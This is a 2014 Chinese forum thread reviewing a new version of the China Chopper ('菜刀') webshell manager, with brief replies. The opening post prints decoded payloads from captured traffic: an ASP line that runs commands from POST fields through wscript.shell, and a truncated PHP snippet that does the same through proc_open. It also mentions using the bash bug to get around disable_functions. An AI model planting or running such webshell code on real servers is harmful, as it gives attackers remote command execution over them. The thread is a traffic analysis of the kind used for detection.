Whysec 发表于 2014-12-15 02:14:59

【转】对新版菜刀的评价


新版本菜刀已经发布有1天多了,没看有人评价。我就简单评下,大牛勿喷~

通信方式不变,post数据依旧含有可被定位的特征码(当然如果不改变服务端代码,我也想不出什么好办法),只能POST,软件自由度不及Hatchet。

主要对旧版本菜刀的不足抓包看下新版本是否有所改进
发现还是老样子

一 asp执行命令
解码代码如下:

Set X=CreateObject("wscript.shell").exec(""""&bd(Request("z1"))&""" /c """&bd(Request("z2"))&""""):If Err Then:S=" "&Err.Description:Err.Clear:Else:O=X.StdOut.ReadAll():E=X.StdErr.ReadAll():S=O&E:End If:Response.write(S)



可以看到只是调用了wscript.shell组件执行命令。
而能够执行系统命令的组件可不止这一种

二 php命令执行

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$m=get_magic_quotes_gpc();$p=base64_decode($m?stripslashes($_POST["z1"]):$_POST["z1"]);$s=base64_decode($m?stripslashes($_POST["z2"]):$_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r."


旧版本的菜刀调用system函数执行命令
新版本调用了proc_open执行命令
但是能够执行系统命令的函数可不止这两个,还有前段时间爆出的php利用bash漏洞绕过disable_function等。

(如果有我未发现的新功能,请补充)

个人的感觉:
菜刀作为前两年的神器,现在却慢慢走过辉煌。虽然斧头仿造了菜刀,但是在功能和灵活度上稍稍胜过了菜刀。还有开源的Altman也完全不输菜刀。菜刀的作者有深厚的编程功底,不过感觉在细节上并不是很在意,这款新发布的菜刀不像是3年后积淀的产物。

chong 发表于 2014-12-15 14:36:50

感谢:P:P:P楼主分享

admni 发表于 2014-12-16 22:51:31

菜刀   还是原来的作者写的吗???怎么觉得老版的好用。。

许繁繁繁 发表于 2014-12-20 10:03:48

菜刀现在不是由原作者写的,

Andre 发表于 2014-12-20 17:18:13

新版的报毒,不敢用
页: [1]
查看完整版本: 【转】对新版菜刀的评价